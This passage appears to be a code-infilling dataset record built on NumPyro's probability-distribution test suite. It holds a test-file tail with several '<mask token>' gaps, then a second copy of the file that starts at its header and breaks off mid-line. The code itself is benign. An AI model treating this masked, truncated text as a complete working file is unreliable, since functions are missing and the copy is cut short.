transforms.LowerCholeskyTransform()\n d = dist.TransformedDistribution(base_dist, [t1, t2, t1])\n assert d.event_dim == 2 + len(prepend_event_shape)\n y = d.sample(random.PRNGKey(0), sample_shape)\n t = transforms.ComposeTransform([t1, t2, t1])\n x = t.inv(y)\n assert x.shape == sample_shape + base_dist.shape()\n log_prob = d.log_prob(y)\n assert log_prob.shape == sample_shape + batch_shape\n t_log_det = t.log_abs_det_jacobian(x, y)\n if prepend_event_shape:\n t_log_det = t_log_det.sum(-1)\n expected_log_prob = base_dist.log_prob(x) - t_log_det\n assert_allclose(log_prob, expected_log_prob, atol=1e-05)\n\n\[email protected]('transformed_dist', 
[dist.TransformedDistribution(\n dist.Normal(np.array([2.0, 3.0]), 1.0), transforms.ExpTransform()),\n dist.TransformedDistribution(dist.Exponential(jnp.ones(2)), [transforms\n .PowerTransform(0.7), transforms.AffineTransform(0.0, jnp.ones(2) * 3)])])\ndef test_transformed_distribution_intermediates(transformed_dist):\n sample, intermediates = transformed_dist.sample_with_intermediates(random\n .PRNGKey(1))\n assert_allclose(transformed_dist.log_prob(sample, intermediates),\n transformed_dist.log_prob(sample))\n\n\ndef test_transformed_transformed_distribution():\n loc, scale = -2, 3\n dist1 = dist.TransformedDistribution(dist.Normal(2, 3), transforms.\n PowerTransform(2.0))\n dist2 = dist.TransformedDistribution(dist1, transforms.AffineTransform(\n -2, 3))\n assert isinstance(dist2.base_dist, dist.Normal)\n assert len(dist2.transforms) == 2\n assert isinstance(dist2.transforms[0], transforms.PowerTransform)\n assert isinstance(dist2.transforms[1], transforms.AffineTransform)\n rng_key = random.PRNGKey(0)\n assert_allclose(loc + scale * dist1.sample(rng_key), dist2.sample(rng_key))\n intermediates = dist2.sample_with_intermediates(rng_key)\n assert len(intermediates) == 2\n\n\ndef _make_iaf(input_dim, hidden_dims, rng_key):\n arn_init, arn = AutoregressiveNN(input_dim, hidden_dims, param_dims=[1, 1])\n _, init_params = arn_init(rng_key, (input_dim,))\n return InverseAutoregressiveTransform(partial(arn, init_params))\n\n\[email protected]('ts', [[transforms.PowerTransform(0.7), transforms\n .AffineTransform(2.0, 3.0)], [transforms.ExpTransform()], [transforms.\n ComposeTransform([transforms.AffineTransform(-2, 3), transforms.\n ExpTransform()]), transforms.PowerTransform(3.0)], [_make_iaf(5,\n hidden_dims=[10], rng_key=random.PRNGKey(0)), transforms.\n PermuteTransform(jnp.arange(5)[::-1]), _make_iaf(5, hidden_dims=[10],\n rng_key=random.PRNGKey(1))]])\ndef test_compose_transform_with_intermediates(ts):\n transform = transforms.ComposeTransform(ts)\n x = random.normal(random.PRNGKey(2), (7, 5))\n y, intermediates = transform.call_with_intermediates(x)\n logdet = transform.log_abs_det_jacobian(x, y, intermediates)\n assert_allclose(y, transform(x))\n assert_allclose(logdet, transform.log_abs_det_jacobian(x, y))\n\n\[email protected]('x_dim, y_dim', [(3, 3), (3, 4)])\ndef test_unpack_transform(x_dim, y_dim):\n xy = np.random.randn(x_dim + y_dim)\n unpack_fn = lambda xy: {'x': xy[:x_dim], 'y': xy[x_dim:]}\n transform = transforms.UnpackTransform(unpack_fn)\n z = transform(xy)\n if x_dim == y_dim:\n with pytest.warns(UserWarning, match='UnpackTransform.inv'):\n t = transform.inv(z)\n else:\n t = transform.inv(z)\n assert_allclose(t, xy)\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS)\ndef test_generated_sample_distribution(jax_dist, sp_dist, params, N_sample=\n 100000, key=random.PRNGKey(11)):\n \"\"\"On samplers that we do not get directly from JAX, (e.g. 
we only get\n Gumbel(0,1) but also provide samplers for Gumbel(loc, scale)), also test\n agreement in the empirical distribution of generated samples between our\n samplers and those from SciPy.\n \"\"\"\n if jax_dist not in [dist.Gumbel]:\n pytest.skip(\n '{} sampling method taken from upstream, no need totest generated samples.'\n .format(jax_dist.__name__))\n jax_dist = jax_dist(*params)\n if sp_dist and not jax_dist.event_shape and not jax_dist.batch_shape:\n our_samples = jax_dist.sample(key, (N_sample,))\n ks_result = osp.kstest(our_samples, sp_dist(*params).cdf)\n assert ks_result.pvalue > 0.05\n\n\[email protected]('jax_dist, params, support', [(dist.\n BernoulliLogits, (5.0,), jnp.arange(2)), (dist.BernoulliProbs, (0.5,),\n jnp.arange(2)), (dist.BinomialLogits, (4.5, 10), jnp.arange(11)), (dist\n .BinomialProbs, (0.5, 11), jnp.arange(12)), (dist.BetaBinomial, (2.0, \n 0.5, 12), jnp.arange(13)), (dist.CategoricalLogits, (np.array([3.0, 4.0,\n 5.0]),), jnp.arange(3)), (dist.CategoricalProbs, (np.array([0.1, 0.5, \n 0.4]),), jnp.arange(3))])\[email protected]('batch_shape', [(5,), ()])\[email protected]('expand', [False, True])\ndef test_enumerate_support_smoke(jax_dist, params, support, batch_shape, expand\n ):\n p0 = jnp.broadcast_to(params[0], batch_shape + jnp.shape(params[0]))\n actual = jax_dist(p0, *params[1:]).enumerate_support(expand=expand)\n expected = support.reshape((-1,) + (1,) * len(batch_shape))\n if expand:\n expected = jnp.broadcast_to(expected, support.shape + batch_shape)\n assert_allclose(actual, expected)\n\n\ndef test_zero_inflated_enumerate_support():\n base_dist = dist.Bernoulli(0.5)\n d = dist.ZeroInflatedDistribution(base_dist, gate=0.5)\n assert d.has_enumerate_support\n assert_allclose(d.enumerate_support(), base_dist.enumerate_support())\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE)\[email protected]('prepend_shape', [(), (2, 3)])\[email protected]('sample_shape', [(), (4,)])\ndef test_expand(jax_dist, sp_dist, params, prepend_shape, sample_shape):\n jax_dist = jax_dist(*params)\n new_batch_shape = prepend_shape + jax_dist.batch_shape\n expanded_dist = jax_dist.expand(new_batch_shape)\n rng_key = random.PRNGKey(0)\n samples = expanded_dist.sample(rng_key, sample_shape)\n assert expanded_dist.batch_shape == new_batch_shape\n assert samples.shape == sample_shape + new_batch_shape + jax_dist.event_shape\n assert expanded_dist.log_prob(samples\n ).shape == sample_shape + new_batch_shape\n assert expanded_dist.expand((3,) + new_batch_shape).batch_shape == (3,\n ) + new_batch_shape\n if prepend_shape:\n with pytest.raises(ValueError, match=\n 'Cannot broadcast distribution of shape'):\n assert expanded_dist.expand((3,) + jax_dist.batch_shape)\n\n\[email protected]('base_shape', [(2, 1, 5), (3, 1), (2, 1, 1), (1, 1,\n 5)])\[email protected]('event_dim', [0, 1, 2, 3])\[email protected]('sample_shape', [(1000,), (1000, 7, 1), (1000, 1, 7)])\ndef test_expand_shuffle_regression(base_shape, event_dim, sample_shape):\n expand_shape = 2, 3, 5\n event_dim = min(event_dim, len(base_shape))\n loc = random.normal(random.PRNGKey(0), base_shape) * 10\n base_dist = dist.Normal(loc, 0.1).to_event(event_dim)\n expanded_dist = base_dist.expand(expand_shape[:len(expand_shape) -\n event_dim])\n samples = expanded_dist.sample(random.PRNGKey(1), sample_shape)\n expected_mean = jnp.broadcast_to(loc, sample_shape[1:] + expanded_dist.\n shape())\n assert_allclose(samples.mean(0), expected_mean, atol=0.1)\n\n\n<mask token>\n\n\ndef 
test_sine_bivariate_von_mises_sample_mean():\n loc = jnp.array([[2.0, -1.0], [-2, 1.0]])\n sine = SineBivariateVonMises(*loc, 5000, 5000, 0.0)\n samples = sine.sample(random.PRNGKey(0), (5000,))\n assert_allclose(_circ_mean(samples).T, loc, rtol=0.005)\n\n\[email protected]('batch_shape', [(), (4,)])\ndef test_polya_gamma(batch_shape, num_points=20000):\n d = dist.TruncatedPolyaGamma(batch_shape=batch_shape)\n rng_key = random.PRNGKey(0)\n x = jnp.linspace(1e-06, d.truncation_point, num_points)\n prob = d.truncation_point / num_points * jnp.exp(logsumexp(d.log_prob(x\n ), axis=-1))\n assert_allclose(prob, jnp.ones(batch_shape), rtol=0.0001)\n z = d.sample(rng_key, sample_shape=(3000,))\n mean = jnp.mean(z, axis=-1)\n assert_allclose(mean, 0.25 * jnp.ones(batch_shape), rtol=0.07)\n\n\[email protected]('extra_event_dims,expand_shape', [(0, (4, 3, 2, 1)\n ), (0, (4, 3, 2, 2)), (1, (5, 4, 3, 2)), (2, (5, 4, 3))])\ndef test_expand_reshaped_distribution(extra_event_dims, expand_shape):\n loc = jnp.zeros((1, 6))\n scale_tril = jnp.eye(6)\n d = dist.MultivariateNormal(loc, scale_tril=scale_tril)\n full_shape = 4, 1, 1, 1, 6\n reshaped_dist = d.expand([4, 1, 1, 1]).to_event(extra_event_dims)\n cut = 4 - extra_event_dims\n batch_shape, event_shape = full_shape[:cut], full_shape[cut:]\n assert reshaped_dist.batch_shape == batch_shape\n assert reshaped_dist.event_shape == event_shape\n large = reshaped_dist.expand(expand_shape)\n assert large.batch_shape == expand_shape\n assert large.event_shape == event_shape\n with pytest.raises((RuntimeError, ValueError)):\n reshaped_dist.expand(expand_shape + (3,))\n with pytest.raises((RuntimeError, ValueError)):\n large.expand(expand_shape[1:])\n\n\[email protected]('batch_shape, mask_shape', [((), ()), ((2,), ()),\n ((), (2,)), ((2,), (2,)), ((4, 2), (1, 2)), ((2,), (4, 2))])\[email protected]('event_shape', [(), (3,)])\ndef test_mask(batch_shape, event_shape, mask_shape):\n jax_dist = dist.Normal().expand(batch_shape + event_shape).to_event(len\n (event_shape))\n mask = dist.Bernoulli(0.5).sample(random.PRNGKey(0), mask_shape)\n if mask_shape == ():\n mask = bool(mask)\n samples = jax_dist.sample(random.PRNGKey(1))\n actual = jax_dist.mask(mask).log_prob(samples)\n assert_allclose(actual != 0, jnp.broadcast_to(mask, lax.\n broadcast_shapes(batch_shape, mask_shape)))\n\n\[email protected]('event_shape', [(), (4,), (2, 4)])\ndef test_mask_grad(event_shape):\n\n def f(x, data):\n base_dist = dist.Beta(jnp.exp(x), jnp.ones(event_shape)).to_event()\n mask = jnp.all(jnp.isfinite(data), tuple(-i - 1 for i in range(len(\n event_shape))))\n log_prob = base_dist.mask(mask).log_prob(data)\n assert log_prob.shape == data.shape[:len(data.shape) - len(event_shape)\n ]\n return log_prob.sum()\n data = np.array([[0.4, np.nan, 0.2, np.nan], [0.5, 0.5, 0.5, 0.5]])\n log_prob, grad = jax.value_and_grad(f)(1.0, data)\n assert jnp.isfinite(grad) and jnp.isfinite(log_prob)\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\ndef test_dist_pytree(jax_dist, sp_dist, params):\n\n def f(x):\n return jax_dist(*params)\n if jax_dist is _ImproperWrapper:\n pytest.skip('Cannot flattening ImproperUniform')\n if jax_dist is dist.EulerMaruyama:\n pytest.skip(\"EulerMaruyama doesn't define flatten/unflatten\")\n jax.jit(f)(0)\n lax.map(f, np.ones(3))\n expected_dist = f(0)\n actual_dist = jax.jit(f)(0)\n expected_sample = expected_dist.sample(random.PRNGKey(0))\n actual_sample = actual_dist.sample(random.PRNGKey(0))\n expected_log_prob = 
expected_dist.log_prob(expected_sample)\n actual_log_prob = actual_dist.log_prob(actual_sample)\n assert_allclose(actual_sample, expected_sample, rtol=1e-06)\n assert_allclose(actual_log_prob, expected_log_prob, rtol=2e-06)\n\n\n<mask token>\n\n\ndef test_expand_no_unnecessary_batch_shape_expansion():\n for arg in (jnp.array(1.0), jnp.ones((2,)), jnp.ones((2, 2))):\n d = dist.Normal(arg, arg).expand([10, 3, *arg.shape])\n roundtripped_d = type(d).tree_unflatten(*d.tree_flatten()[::-1])\n assert d.batch_shape == roundtripped_d.batch_shape\n assert d.base_dist.batch_shape == roundtripped_d.base_dist.batch_shape\n assert d.base_dist.event_shape == roundtripped_d.base_dist.event_shape\n assert jnp.allclose(d.base_dist.loc, roundtripped_d.base_dist.loc)\n assert jnp.allclose(d.base_dist.scale, roundtripped_d.base_dist.scale)\n\n def bs(arg):\n return dist.Normal(arg, arg).expand([10, 3, *arg.shape])\n d = bs(arg)\n dj = jax.jit(bs)(arg)\n assert isinstance(d, dist.ExpandedDistribution)\n assert isinstance(dj, dist.ExpandedDistribution)\n assert d.batch_shape == dj.batch_shape\n assert d.base_dist.batch_shape == dj.base_dist.batch_shape\n assert d.base_dist.event_shape == dj.base_dist.event_shape\n assert jnp.allclose(d.base_dist.loc, dj.base_dist.loc)\n assert jnp.allclose(d.base_dist.scale, dj.base_dist.scale)\n\n\[email protected]('batch_shape', [(), (4,), (2, 3)], ids=str)\ndef test_kl_delta_normal_shape(batch_shape):\n v = np.random.normal(size=batch_shape)\n loc = np.random.normal(size=batch_shape)\n scale = np.exp(np.random.normal(size=batch_shape))\n p = dist.Delta(v)\n q = dist.Normal(loc, scale)\n assert kl_divergence(p, q).shape == batch_shape\n\n\ndef test_kl_delta_normal():\n v = np.random.normal()\n loc = np.random.normal()\n scale = np.exp(np.random.normal())\n p = dist.Delta(v, 10.0)\n q = dist.Normal(loc, scale)\n assert_allclose(kl_divergence(p, q), 10.0 - q.log_prob(v))\n\n\[email protected]('batch_shape', [(), (4,), (2, 3)], ids=str)\[email protected]('event_shape', [(), (4,), (2, 3)], ids=str)\ndef test_kl_independent_normal(batch_shape, event_shape):\n shape = batch_shape + event_shape\n p = dist.Normal(np.random.normal(size=shape), np.exp(np.random.normal(\n size=shape)))\n q = dist.Normal(np.random.normal(size=shape), np.exp(np.random.normal(\n size=shape)))\n actual = kl_divergence(dist.Independent(p, len(event_shape)), dist.\n Independent(q, len(event_shape)))\n expected = sum_rightmost(kl_divergence(p, q), len(event_shape))\n assert_allclose(actual, expected)\n\n\[email protected]('batch_shape', [(), (4,), (2, 3)], ids=str)\[email protected]('event_shape', [(), (4,), (2, 3)], ids=str)\ndef test_kl_expanded_normal(batch_shape, event_shape):\n shape = batch_shape + event_shape\n p = dist.Normal(np.random.normal(), np.exp(np.random.normal())).expand(\n shape)\n q = dist.Normal(np.random.normal(), np.exp(np.random.normal())).expand(\n shape)\n actual = kl_divergence(dist.Independent(p, len(event_shape)), dist.\n Independent(q, len(event_shape)))\n expected = sum_rightmost(kl_divergence(p, q), len(event_shape))\n assert_allclose(actual, expected)\n\n\[email protected]('shape', [(), (4,), (2, 3)], ids=str)\[email protected]('p_dist, q_dist', [(dist.Beta, dist.Beta), (dist.\n Gamma, dist.Gamma), (dist.Kumaraswamy, dist.Beta), (dist.Normal, dist.\n Normal), (dist.Weibull, dist.Gamma)])\ndef test_kl_univariate(shape, p_dist, q_dist):\n\n def make_dist(dist_class):\n params = {}\n for k, c in dist_class.arg_constraints.items():\n if c is constraints.real:\n params[k] = 
np.random.normal(size=shape)\n elif c is constraints.positive:\n params[k] = np.exp(np.random.normal(size=shape))\n else:\n raise ValueError(f'Missing pattern for param {k}.')\n d = dist_class(**params)\n if dist_class is dist.Kumaraswamy:\n d.KL_KUMARASWAMY_BETA_TAYLOR_ORDER = 1000\n return d\n p = make_dist(p_dist)\n q = make_dist(q_dist)\n actual = kl_divergence(p, q)\n x = p.sample(random.PRNGKey(0), (10000,)).copy()\n expected = jnp.mean(p.log_prob(x) - q.log_prob(x), 0)\n assert_allclose(actual, expected, rtol=0.05)\n\n\[email protected]('shape', [(4,), (2, 3)], ids=str)\ndef test_kl_dirichlet_dirichlet(shape):\n p = dist.Dirichlet(np.exp(np.random.normal(size=shape)))\n q = dist.Dirichlet(np.exp(np.random.normal(size=shape)))\n actual = kl_divergence(p, q)\n x = p.sample(random.PRNGKey(0), (10000,)).copy()\n expected = jnp.mean(p.log_prob(x) - q.log_prob(x), 0)\n assert_allclose(actual, expected, rtol=0.05)\n\n\ndef test_vmapped_binomial_p0():\n\n def sample_binomial_withp0(key):\n n = 2 * (random.uniform(key) > 0.5)\n _, key = random.split(key)\n return dist.Binomial(total_count=n, probs=0).sample(key)\n jax.vmap(sample_binomial_withp0)(random.split(random.PRNGKey(0), 1))\n\n\n<mask token>\n\n\ndef _allclose_or_equal(a1, a2):\n if isinstance(a1, np.ndarray):\n return np.allclose(a2, a1)\n elif isinstance(a1, jnp.ndarray):\n return jnp.allclose(a2, a1)\n elif isinstance(a1, csr_matrix):\n return np.allclose(a2.todense(), a1.todense())\n else:\n return a2 == a1 or a2 is a1\n\n\ndef _tree_equal(t1, t2):\n t = jax.tree_util.tree_map(_allclose_or_equal, t1, t2)\n return jnp.all(jax.flatten_util.ravel_pytree(t)[0])\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\ndef test_vmap_dist(jax_dist, sp_dist, params):\n param_names = list(inspect.signature(jax_dist).parameters.keys())\n vmappable_param_idxs = _get_vmappable_dist_init_params(jax_dist)\n vmappable_param_idxs = vmappable_param_idxs[:len(params)]\n if len(vmappable_param_idxs) == 0:\n return\n\n def make_jax_dist(*params):\n return jax_dist(*params)\n\n def sample(d: dist.Distribution):\n return d.sample(random.PRNGKey(0))\n d = make_jax_dist(*params)\n if isinstance(d, _SparseCAR) and d.is_sparse:\n return\n in_out_axes_cases = [(tuple(0 if i in vmappable_param_idxs else None for\n i in range(len(params))), 0), *(([(0 if i == idx else None) for i in\n range(len(params))], 0) for idx in vmappable_param_idxs if params[\n idx] is not None), *(([(0 if i == idx else None) for i in range(len\n (params))], vmap_over(d, **{param_names[idx]: 0})) for idx in\n vmappable_param_idxs if params[idx] is not None), *(([(1 if i ==\n idx else None) for i in range(len(params))], vmap_over(d, **{\n param_names[idx]: 1})) for idx in vmappable_param_idxs if \n isinstance(params[idx], jnp.ndarray) and jnp.array(params[idx]).\n ndim > 0 and jax_dist is not _GeneralMixture)]\n for in_axes, out_axes in in_out_axes_cases:\n batched_params = [(jax.tree_map(lambda x: jnp.expand_dims(x, ax),\n arg) if isinstance(ax, int) else arg) for arg, ax in zip(params,\n in_axes)]\n d = make_jax_dist(*params)\n batched_d = jax.vmap(make_jax_dist, in_axes=in_axes, out_axes=out_axes\n )(*batched_params)\n eq = vmap(lambda x, y: _tree_equal(x, y), in_axes=(out_axes, None))(\n batched_d, d)\n assert eq == jnp.array([True])\n samples_dist = sample(d)\n samples_batched_dist = jax.vmap(sample, in_axes=(out_axes,))(batched_d)\n assert samples_batched_dist.shape == (1, *samples_dist.shape)\n\n\ndef test_multinomial_abstract_total_count():\n 
probs = jnp.array([0.2, 0.5, 0.3])\n key = random.PRNGKey(0)\n\n def f(x):\n total_count = x.sum(-1)\n return dist.Multinomial(total_count, probs=probs, total_count_max=10\n ).sample(key)\n x = dist.Multinomial(10, probs).sample(key)\n y = jax.jit(f)(x)\n assert_allclose(x, y, rtol=1e-06)\n\n\ndef test_normal_log_cdf():\n loc = jnp.array([[0.0, -10.0, 20.0]])\n scale = jnp.array([[1, 5, 7]])\n values = jnp.linspace(-5, 5, 100).reshape(-1, 1)\n numpyro_log_cdf = dist.Normal(loc=loc, scale=scale).log_cdf(values)\n numpyro_cdf = dist.Normal(loc=loc, scale=scale).cdf(values)\n jax_log_cdf = jax_norm.logcdf(loc=loc, scale=scale, x=values)\n assert_allclose(numpyro_log_cdf, jax_log_cdf)\n assert_allclose(jnp.exp(numpyro_log_cdf), numpyro_cdf, rtol=1e-06)\n\n\[email protected]('value', [-15.0, jnp.array([[-15.0], [-10.0], [-\n 5.0]]), jnp.array([[[-15.0], [-10.0], [-5.0]], [[-14.0], [-9.0], [-4.0]]])]\n )\ndef test_truncated_normal_log_prob_in_tail(value):\n loc = 1.35\n scale = jnp.geomspace(0.01, 1, 10)\n low, high = -20, -1.0\n a, b = (low - loc) / scale, (high - loc) / scale\n numpyro_log_prob = dist.TruncatedNormal(loc, scale, low=low, high=high\n ).log_prob(value)\n jax_log_prob = jax_truncnorm.logpdf(value, loc=loc, scale=scale, a=a, b=b)\n assert_allclose(numpyro_log_prob, jax_log_prob, rtol=1e-06)\n\n\ndef test_sample_truncated_normal_in_tail():\n tail_dist = dist.TruncatedNormal(loc=0, scale=1, low=-16, high=-15)\n samples = tail_dist.sample(random.PRNGKey(0), sample_shape=(10000,))\n assert ~jnp.isinf(samples).any()\n\n\[email protected]_custom_prng()\ndef test_jax_custom_prng():\n samples = dist.Normal(0, 5).sample(random.PRNGKey(0), sample_shape=(1000,))\n assert ~jnp.isinf(samples).any()\n",
"step-5": "# Copyright Contributors to the Pyro project.\n# SPDX-License-Identifier: Apache-2.0\n\nfrom collections import namedtuple\nfrom functools import partial\nimport inspect\nfrom itertools import product\nimport math\nimport os\n\nimport numpy as np\nfrom numpy.testing import assert_allclose, assert_array_equal\nimport pytest\nimport scipy\nfrom scipy.sparse import csr_matrix\nimport scipy.stats as osp\n\nimport jax\nfrom jax import grad, lax, vmap\nimport jax.numpy as jnp\nimport jax.random as random\nfrom jax.scipy.special import expit, logsumexp\nfrom jax.scipy.stats import norm as jax_norm, truncnorm as jax_truncnorm\n\nimport numpyro.distributions as dist\nfrom numpyro.distributions import (\n SineBivariateVonMises,\n constraints,\n kl_divergence,\n transforms,\n)\nfrom numpyro.distributions.batch_util import vmap_over\nfrom numpyro.distributions.discrete import _to_probs_bernoulli, _to_probs_multinom\nfrom numpyro.distributions.flows import InverseAutoregressiveTransform\nfrom numpyro.distributions.gof import InvalidTest, auto_goodness_of_fit\nfrom numpyro.distributions.transforms import (\n LowerCholeskyAffine,\n PermuteTransform,\n PowerTransform,\n SimplexToOrderedTransform,\n SoftplusTransform,\n biject_to,\n)\nfrom numpyro.distributions.util import (\n matrix_to_tril_vec,\n multinomial,\n signed_stick_breaking_tril,\n sum_rightmost,\n vec_to_tril_matrix,\n)\nfrom numpyro.nn import AutoregressiveNN\n\nTEST_FAILURE_RATE = 2e-5 # For all goodness-of-fit tests.\n\n\ndef my_kron(A, B):\n D = A[..., :, None, :, None] * B[..., None, :, None, :]\n ds = D.shape\n newshape = (*ds[:-4], ds[-4] * ds[-3], ds[-2] * ds[-1])\n return D.reshape(newshape)\n\n\ndef _identity(x):\n return x\n\n\ndef _circ_mean(angles):\n return jnp.arctan2(\n jnp.mean(jnp.sin(angles), axis=0), jnp.mean(jnp.cos(angles), axis=0)\n )\n\n\ndef sde_fn1(x, _):\n lam = 0.1\n sigma2 = 0.1\n return lam * x, sigma2\n\n\ndef sde_fn2(xy, _):\n tau, a = 2.0, 1.1\n x, y = xy[0], xy[1]\n dx = tau * (x - x**3.0 / 3.0 + y)\n dy = (1.0 / tau) * (a - x)\n dxy = jnp.vstack([dx, dy]).reshape(xy.shape)\n\n sigma2 = 0.1\n return dxy, sigma2\n\n\nclass T(namedtuple(\"TestCase\", [\"jax_dist\", \"sp_dist\", \"params\"])):\n def __new__(cls, jax_dist, *params):\n sp_dist = get_sp_dist(jax_dist)\n return super(cls, T).__new__(cls, jax_dist, sp_dist, params)\n\n\ndef _mvn_to_scipy(loc, cov, prec, tril):\n jax_dist = dist.MultivariateNormal(loc, cov, prec, tril)\n mean = jax_dist.mean\n cov = jax_dist.covariance_matrix\n return osp.multivariate_normal(mean=mean, cov=cov)\n\n\ndef _multivariate_t_to_scipy(df, loc, tril):\n if scipy.__version__ < \"1.6.0\":\n pytest.skip(\n \"Multivariate Student-T distribution is not available in scipy < 1.6\"\n )\n jax_dist = dist.MultivariateStudentT(df, loc, tril)\n mean = jax_dist.mean\n cov = jax_dist.covariance_matrix\n return osp.multivariate_t(loc=mean, shape=cov, df=df)\n\n\ndef _lowrank_mvn_to_scipy(loc, cov_fac, cov_diag):\n jax_dist = dist.LowRankMultivariateNormal(loc, cov_fac, cov_diag)\n mean = jax_dist.mean\n cov = jax_dist.covariance_matrix\n return osp.multivariate_normal(mean=mean, cov=cov)\n\n\ndef _truncnorm_to_scipy(loc, scale, low, high):\n if low is None:\n a = -np.inf\n else:\n a = (low - loc) / scale\n if high is None:\n b = np.inf\n else:\n b = (high - loc) / scale\n return osp.truncnorm(a, b, loc=loc, scale=scale)\n\n\ndef _TruncatedNormal(loc, scale, low, high):\n return dist.TruncatedNormal(loc=loc, scale=scale, low=low, high=high)\n\n\ndef _TruncatedCauchy(loc, scale, low, 
high):\n return dist.TruncatedCauchy(loc=loc, scale=scale, low=low, high=high)\n\n\n_TruncatedNormal.arg_constraints = {}\n_TruncatedNormal.reparametrized_params = []\n_TruncatedNormal.infer_shapes = lambda *args: (lax.broadcast_shapes(*args), ())\n\n\nclass SineSkewedUniform(dist.SineSkewed):\n def __init__(self, skewness, **kwargs):\n lower, upper = (np.array([-math.pi, -math.pi]), np.array([math.pi, math.pi]))\n base_dist = dist.Uniform(lower, upper, **kwargs).to_event(lower.ndim)\n super().__init__(base_dist, skewness, **kwargs)\n\n\n@vmap_over.register\ndef _vmap_over_sine_skewed_uniform(self: SineSkewedUniform, skewness=None):\n return vmap_over.dispatch(dist.SineSkewed)(self, base_dist=None, skewness=skewness)\n\n\nclass SineSkewedVonMises(dist.SineSkewed):\n def __init__(self, skewness, **kwargs):\n von_loc, von_conc = (np.array([0.0]), np.array([1.0]))\n base_dist = dist.VonMises(von_loc, von_conc, **kwargs).to_event(von_loc.ndim)\n super().__init__(base_dist, skewness, **kwargs)\n\n\n@vmap_over.register\ndef _vmap_over_sine_skewed_von_mises(self: SineSkewedVonMises, skewness=None):\n return vmap_over.dispatch(dist.SineSkewed)(self, base_dist=None, skewness=skewness)\n\n\nclass SineSkewedVonMisesBatched(dist.SineSkewed):\n def __init__(self, skewness, **kwargs):\n von_loc, von_conc = (np.array([0.0, -1.234]), np.array([1.0, 10.0]))\n base_dist = dist.VonMises(von_loc, von_conc, **kwargs).to_event(von_loc.ndim)\n super().__init__(base_dist, skewness, **kwargs)\n\n\n@vmap_over.register\ndef _vmap_over_sine_skewed_von_mises_batched(\n self: SineSkewedVonMisesBatched, skewness=None\n):\n return vmap_over.dispatch(dist.SineSkewed)(self, base_dist=None, skewness=skewness)\n\n\nclass _GaussianMixture(dist.MixtureSameFamily):\n arg_constraints = {}\n reparametrized_params = []\n\n def __init__(self, mixing_probs, loc, scale):\n component_dist = dist.Normal(loc=loc, scale=scale)\n mixing_distribution = dist.Categorical(probs=mixing_probs)\n super().__init__(\n mixing_distribution=mixing_distribution,\n component_distribution=component_dist,\n )\n\n @property\n def loc(self):\n return self.component_distribution.loc\n\n @property\n def scale(self):\n return self.component_distribution.scale\n\n\n@vmap_over.register\ndef _vmap_over_gaussian_mixture(self: _GaussianMixture, loc=None, scale=None):\n component_distribution = vmap_over(\n self.component_distribution, loc=loc, scale=scale\n )\n return vmap_over.dispatch(dist.MixtureSameFamily)(\n self, _component_distribution=component_distribution\n )\n\n\nclass _Gaussian2DMixture(dist.MixtureSameFamily):\n arg_constraints = {}\n reparametrized_params = []\n\n def __init__(self, mixing_probs, loc, covariance_matrix):\n component_dist = dist.MultivariateNormal(\n loc=loc, covariance_matrix=covariance_matrix\n )\n mixing_distribution = dist.Categorical(probs=mixing_probs)\n super().__init__(\n mixing_distribution=mixing_distribution,\n component_distribution=component_dist,\n )\n\n @property\n def loc(self):\n return self.component_distribution.loc\n\n @property\n def covariance_matrix(self):\n return self.component_distribution.covariance_matrix\n\n\n@vmap_over.register\ndef _vmap_over_gaussian_2d_mixture(self: _Gaussian2DMixture, loc=None):\n component_distribution = vmap_over(self.component_distribution, loc=loc)\n return vmap_over.dispatch(dist.MixtureSameFamily)(\n self, _component_distribution=component_distribution\n )\n\n\nclass _GeneralMixture(dist.MixtureGeneral):\n arg_constraints = {}\n reparametrized_params = []\n\n def __init__(self, 
mixing_probs, locs, scales):\n component_dists = [\n dist.Normal(loc=loc_, scale=scale_) for loc_, scale_ in zip(locs, scales)\n ]\n mixing_distribution = dist.Categorical(probs=mixing_probs)\n return super().__init__(\n mixing_distribution=mixing_distribution,\n component_distributions=component_dists,\n )\n\n @property\n def locs(self):\n # hotfix for vmapping tests, which cannot easily check non-array attributes\n return self.component_distributions[0].loc\n\n @property\n def scales(self):\n return self.component_distributions[0].scale\n\n\n@vmap_over.register\ndef _vmap_over_general_mixture(self: _GeneralMixture, locs=None, scales=None):\n component_distributions = [\n vmap_over(d, loc=locs, scale=scales) for d in self.component_distributions\n ]\n return vmap_over.dispatch(dist.MixtureGeneral)(\n self, _component_distributions=component_distributions\n )\n\n\nclass _General2DMixture(dist.MixtureGeneral):\n arg_constraints = {}\n reparametrized_params = []\n\n def __init__(self, mixing_probs, locs, covariance_matrices):\n component_dists = [\n dist.MultivariateNormal(loc=loc_, covariance_matrix=covariance_matrix)\n for loc_, covariance_matrix in zip(locs, covariance_matrices)\n ]\n mixing_distribution = dist.Categorical(probs=mixing_probs)\n return super().__init__(\n mixing_distribution=mixing_distribution,\n component_distributions=component_dists,\n )\n\n @property\n def locs(self):\n # hotfix for vmapping tests, which cannot easily check non-array attributes\n return self.component_distributions[0].loc\n\n @property\n def covariance_matrices(self):\n return self.component_distributions[0].covariance_matrix\n\n\n@vmap_over.register\ndef _vmap_over_general_2d_mixture(self: _General2DMixture, locs=None):\n component_distributions = [\n vmap_over(d, loc=locs) for d in self.component_distributions\n ]\n return vmap_over.dispatch(dist.MixtureGeneral)(\n self, _component_distributions=component_distributions\n )\n\n\nclass _ImproperWrapper(dist.ImproperUniform):\n def sample(self, key, sample_shape=()):\n transform = biject_to(self.support)\n prototype_value = jnp.zeros(self.event_shape)\n unconstrained_event_shape = jnp.shape(transform.inv(prototype_value))\n shape = sample_shape + self.batch_shape + unconstrained_event_shape\n unconstrained_samples = random.uniform(key, shape, minval=-2, maxval=2)\n return transform(unconstrained_samples)\n\n\nclass ZeroInflatedPoissonLogits(dist.discrete.ZeroInflatedLogits):\n arg_constraints = {\"rate\": constraints.positive, \"gate_logits\": constraints.real}\n pytree_data_fields = (\"rate\",)\n\n def __init__(self, rate, gate_logits, *, validate_args=None):\n self.rate = rate\n super().__init__(dist.Poisson(rate), gate_logits, validate_args=validate_args)\n\n\n@vmap_over.register\ndef _vmap_over_zero_inflated_poisson_logits(\n self: ZeroInflatedPoissonLogits, rate=None, gate_logits=None\n):\n dist_axes = 